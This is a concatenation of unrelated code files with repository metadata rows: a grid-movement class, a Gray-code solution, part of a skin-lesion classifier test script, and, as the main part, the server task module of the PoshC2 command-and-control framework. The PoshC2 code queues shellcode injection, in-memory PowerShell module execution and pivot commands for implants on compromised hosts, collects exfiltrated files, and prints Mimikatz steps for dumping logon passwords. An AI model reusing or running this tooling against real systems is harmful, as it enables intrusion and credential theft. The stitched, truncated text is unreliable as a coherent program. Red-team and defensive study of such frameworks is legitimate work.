cmd = cmd.upper()
if cmd == 'L':
if self.position[0]-1 >= 0:
self.position = (self.position[0]-1,self.position[1])
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'R':
if self.position[0]+1 < self._region_size[0]:
self.position = (self.position[0]+1,self.position[1])
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'U':
if self.position[1]-1 >= 0:
self.position = (self.position[0],self.position[1]-1)
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'D':
if self.position[1]+1 < self._region_size[1]:
self.position = (self.position[0],self.position[1]+1)
else:
raise MoveOutOfRegion(self,cmd)
elif cmd == 'S':
pass
def moveable_direction(self):
direction = ['S']
if self.position[0] > 0:
direction.append('L')
if self.position[0] < self._region_size[0]-1:
direction.append('R')
if self.position[1] > 0:
direction.append('U')
if self.position[1] < self._region_size[1]-1:
direction.append('D')
return direction
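# --- Minimal usage sketch (added for illustration). Component's constructor is not shown
# in this file, so the stub below just sets the two attributes MoveComponent relies on:
# position (x, y) and _region_size (width, height).
if __name__ == '__main__':
    class _DemoMove(MoveComponent):
        def __init__(self):
            self.position = (0, 0)
            self._region_size = (5, 5)
    demo = _DemoMove()
    print(demo.moveable_direction())  # ['S', 'R', 'D'] at the top-left corner
    demo.move('R')
    demo.move('D')
    print(demo.position)              # (1, 1)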
| 34.170213 | 104 | 0.52802 | 1,533 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 214 | 0.13325 |
35ff5a9fe6f25456cafae5f86dcd151f7638267e | 35,016 | py | Python | poshc2/server/Tasks.py | slackr/PoshC2 | d4804f1f534dac53b95dd6dd6578431beaf79360 | ["BSD-3-Clause"] | 1,504 | 2016-07-12T04:14:00.000Z | 2022-03-31T02:59:30.000Z | poshc2/server/Tasks.py | PhilKeeble/PoshC2 | 498b30097e12e46b5aa454feaeaa4bbae3c04c0d | ["BSD-3-Clause"] | 139 | 2016-10-13T10:41:18.000Z | 2022-03-31T13:22:47.000Z | poshc2/server/Tasks.py | PhilKeeble/PoshC2 | 498b30097e12e46b5aa454feaeaa4bbae3c04c0d | ["BSD-3-Clause"] | 377 | 2016-07-12T03:10:03.000Z | 2022-03-31T10:04:13.000Z |
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
                    with open(("%sbackground-data.txt" % ReportsDirectory), "a+") as miscData:
                        miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
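def _split_download_chunk(raw):
    '''Illustrative helper (added; not part of PoshC2). The download-file replies handled
    above carry a 10-character header: chunk number in positions 0-4 and total chunk count
    in positions 5-9, followed by the raw file data, e.g. "0000100003" + data -> (1, 3, data).'''
    header = raw[:10]
    if isinstance(header, bytes):
        header = header.decode("utf-8")
    return int(header[:5]), int(header[5:10]), raw[10:]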
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
                # if there are no tasks but it's a normal beacon, send a 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
| 64.486188 | 474 | 0.499714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,882 | 0.225097 |
c4005a008048988474573247edb485bd20d1bb6d | 1,029 | py | Python | Leetcode/89.grayCode.py | Song2017/Leetcode_python | 99d9f3cec0e47ddab6ec107392a6b33bf6c1d046 | ["MIT"] | 1 | 2019-05-14T00:55:30.000Z | 2019-05-14T00:55:30.000Z | LeetcodeView/89.grayCode.md | Song2017/Leetcode_python | 99d9f3cec0e47ddab6ec107392a6b33bf6c1d046 | ["MIT"] | null | null | null | LeetcodeView/89.grayCode.md | Song2017/Leetcode_python | 99d9f3cec0e47ddab6ec107392a6b33bf6c1d046 | ["MIT"] | null | null | null |
class Solution:
'''
    Gray code is a binary numeral system in which two successive values differ in only one bit.
    Given a non-negative integer n representing the total number of bits in the code, print its
    Gray code sequence. The sequence must begin with 0.
    Input: 2
    Output: [0,1,3,2]
    Explanation: 00 - 0, 01 - 1, 11 - 3, 10 - 2
'''
def grayCode(self, n: int):
        # Observe how the Gray code sequence for n relates to the sequence for n - 1:
        # prepend a bit to each code -- a leading 0 keeps the previous list's values,
        # a leading 1 adds 2**(n-1) to each element of the previous list (reversed).
ans, cnt = [0], 0
while cnt < n:
ad = 2**cnt
tmp = list(map(lambda x: x ^ ad, ans))
tmp.reverse()
ans += tmp
cnt += 1
return ans
def grayCodeF(self, n: int):
        '''
        The key is the Gray code generation rule: G(i) = i ^ (i // 2), i.e. i ^ (i >> 1);
        for example, with n = 3:
G(0) = 000
G(1) = 1 ^ 0 = 001 ^ 000 = 001
G(2) = 2 ^ 1 = 010 ^ 001 = 011
G(3) = 3 ^ 1 = 011 ^ 001 = 010
G(4) = 4 ^ 2 = 100 ^ 010 = 110
G(5) = 5 ^ 2 = 101 ^ 010 = 111
G(6) = 6 ^ 3 = 110 ^ 011 = 101
G(7) = 7 ^ 3 = 111 ^ 011 = 100
'''
return [i ^ i >> 1 for i in range(2**n)]
s = Solution()
print(s.grayCode(3))
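# --- Quick self-check (added): consecutive Gray codes should differ in exactly one bit,
# i.e. the XOR of neighbouring codes is a power of two.
codes = s.grayCodeF(3)
print(codes)  # [0, 1, 3, 2, 6, 7, 5, 4]
assert all(bin(a ^ b).count('1') == 1 for a, b in zip(codes, codes[1:]))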
| 25.725 | 62 | 0.433431 | 1,294 | 0.970743 | 0 | 0 | 0 | 0 | 0 | 0 | 918 | 0.688672 |
c400620022eebd6f0df3a706d1f575d077a9ad78 | 6,781 | py | Python | object/test.py | SkinLesionsResearch/NCPL | 562e9664f77e14ed9b2655b82e8498b8a8ce5d2d | ["MIT"] | null | null | null | object/test.py | SkinLesionsResearch/NCPL | 562e9664f77e14ed9b2655b82e8498b8a8ce5d2d | ["MIT"] | null | null | null | object/test.py | SkinLesionsResearch/NCPL | 562e9664f77e14ed9b2655b82e8498b8a8ce5d2d | ["MIT"] | null | null | null |
import argparse
import os, sys
os.chdir("/home/jackie/ResearchArea/SkinCancerResearch/semi_skin_cancer")
sys.path.append("/home/jackie/ResearchArea/SkinCancerResearch/semi_skin_cancer")
print(os.getcwd())
import os.path as osp
import torchvision
import numpy as np
import torch
# import torch.nn as nn
# import torch.optim as optim
# from itertools import cycle
from torchvision import transforms
# import network, loss
from torch.utils.data import DataLoader
from data_list import ImageList, ImageList_idx
import random, pdb, math, copy
from evaluation.draw import draw_ROC, draw_TSNE, draw_cm
from evaluation.metrics import get_metrics, get_metrics_sev_class, get_test_data
import matplotlib.pyplot as plt
from transforms import image_test
import utils
plt.rc('font', family='Times New Roman')
def op_copy(optimizer):
for param_group in optimizer.param_groups:
param_group['lr0'] = param_group['lr']
return optimizer
def image_test(resize_size=256, crop_size=224, alexnet=False):
if not alexnet:
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
else:
normalize = Normalize(meanfile='./ilsvrc_2012_mean.npy')
return transforms.Compose([
transforms.Resize((resize_size, resize_size)),
# transforms.CenterCrop(crop_size),
transforms.ToTensor(),
normalize
])
def data_load(args):
## prepare data
dsets = {}
dset_loaders = {}
test_txt = open(osp.join(args.dset_path, 'test.txt')).readlines()
image_test_transform = image_test()
if args.net[0:5] == "senet":
image_test_transform = image_test(299)
elif args.net[0:3] == "ran":
image_test_transform = image_test(32)
dsets["test"] = ImageList(test_txt, args, transform=image_test_transform)
dset_loaders["test"] = DataLoader(dsets["test"], batch_size=args.batch_size, shuffle=True,
num_workers=args.worker, drop_last=False)
return dset_loaders
def print_args(args):
s = "==========================================\n"
for arg, content in args.__dict__.items():
s += "{}:{}\n".format(arg, content)
return s
def test_target(args):
SEED = args.seed
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
np.random.seed(SEED)
random.seed(SEED)
## set base network
net = utils.get_model(args.net, args.num_classes)
if args.num_classes == 2:
args.modelpath = args.output_dir_train + '/best_params_auc.pt'
else:
args.modelpath = args.output_dir_train + '/best_params.pt'
print(args.modelpath)
net.load_state_dict(torch.load(args.modelpath))
net.eval()
dset_loaders = data_load(args)
features, logits, y_true, y_predict = get_test_data(dset_loaders['test'], net)
if args.num_classes == 2:
accuracy, kappa, report, sensitivity, specificity, roc_auc, f1, recall, precision = \
get_metrics_sev_class(logits, y_true, y_predict)
else:
accuracy, kappa, report, sensitivity, specificity, roc_auc, f1, recall, precision = \
get_metrics_sev_class(logits, y_true, y_predict)
draw_ROC(logits, y_true, args.label_names, args.output_dir)
draw_cm(y_true, y_predict, args.label_names, args.output_dir)
draw_TSNE(features, y_true, args.label_names, args.output_dir)
log_str = '\nAccuracy = {:.2f}%, Kappa = {:.4f},' \
' Sensitivity = {:.4f}, Specificity = {:.4f}, AUROC = {:.4f}\n' \
' F1 = {:.4f}, Recall = {:.4f}, Precision = {:.4f}' \
.format(accuracy, kappa, sensitivity, specificity, roc_auc, f1, recall, precision)
args.out_file.write(log_str)
args.out_file.write(report)
args.out_file.flush()
print(log_str)
print(report)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='oral_cancer')
parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help="device id to run")
parser.add_argument('--batch_size', type=int, default=32, help="batch_size")
parser.add_argument('--num_classes', type=int, default=7, help="number of classes")
parser.add_argument('--worker', type=int, default=12, help="number of workers")
